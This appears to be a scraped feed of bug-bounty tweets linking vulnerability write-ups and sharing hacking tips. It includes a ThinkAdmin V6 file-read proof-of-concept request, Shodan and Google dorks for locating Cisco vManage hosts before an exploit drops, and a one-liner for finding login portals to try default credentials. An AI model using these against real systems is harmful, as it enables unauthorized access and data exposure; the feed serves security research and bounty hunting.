🍃 Are you stuck on authorization bypass in a Spring app? This tip can be helpful to you!
(10/10) Read about the full discovery here > orca.security/resources/blog…
I found a vulnerability in #Azure allowing me to access Azure accounts of companies worth billions We all know vulnerabilities exist. This isn't an injection, XSS, or RCE. But the crazy thing about it? It took 2 hours to discover. 🤯 Here's the story of #AutoWarp👇 (1/10)
Wordpress Plugin Update Confusion - The full guide on how to scan and mitigate the next Big Supply chain Attack galnagli.com/Wordpress_Plug… #BugBounty
4 years of college turned an extrovert into an introvert
A Thread about Blind XSS tips Pro Tip: Bookmark this tweet!
New attacks on OAuth: SSRF by design and Session Poisoning by @artsploit portswigger.net/research/hidde…
Is “STILL” your favourite triager? @Hacker0x01 #bugbounty #vote #bugbountylife
Bruh I was today years old when I found out Mac books did this 🤯
Dependency Confusion: How I Hacked Into Apple, Microsoft and Dozens of Other Companies 👇Check the thread after reading for a few bonus facts👇 medium.com/@alex.birsan/d…
ThinkAdmin V6 Readfile? 🧐 Poc: GET /admin.html?s=admin/api.Update/get/encode/34392q302x2r1b37382p382x2r1b1a1a1b2x322s2t3c1a342w34 Reference: mp.weixin.qq.com/s/3t7r7FCirDEA… issues: github.com/zoujingli/Thin…
Bug hunters: Be ready for the SD-WAN exploit to drop. Large companies use this. Payouts could be big! 😉 Google intitle:"Cisco vManage" intitle:"Viptela vManage" Shodan title:"Viptela vManage" title:"Cisco vManage" title:vManage http.favicon.hash:-904700687 ssl:"O=Viptela Inc"
Why I love hacking IIS servers:
- Case insensitive, amazing for content discovery
- IIS Shortname
- VIEWSTATE deserialization RCE gadget
- Web.config upload tricks
- Debug mode w/ detailed stack traces and full path
- Debugging scripts often deployed (ELMAH, Trace)
- Telerik RCE
My new favorite way to find login portals and search for default credentials. So far VERY useful and quick! cat hosts.txt | httprobe -c 300 | ffuf -w - -u FUZZ -mr "assword"
#BugBounty The day that you start looking for critical bugs, your mindset is going to change and you are eventually going to find something good, but if you keep using your time looking for open redirects you will never level up. This is going to take time, but it will be worth it #infosec
I made my script public. It has all the detailed steps for setting up subdomain takeover automation for AWS, If you are interested. github.com/In3tinct/Taken
GitHub - In3tinct/Taken: Takeover subdomains using AWS dangling elastic ips and have a working POC...
How it started - how it's going 🐚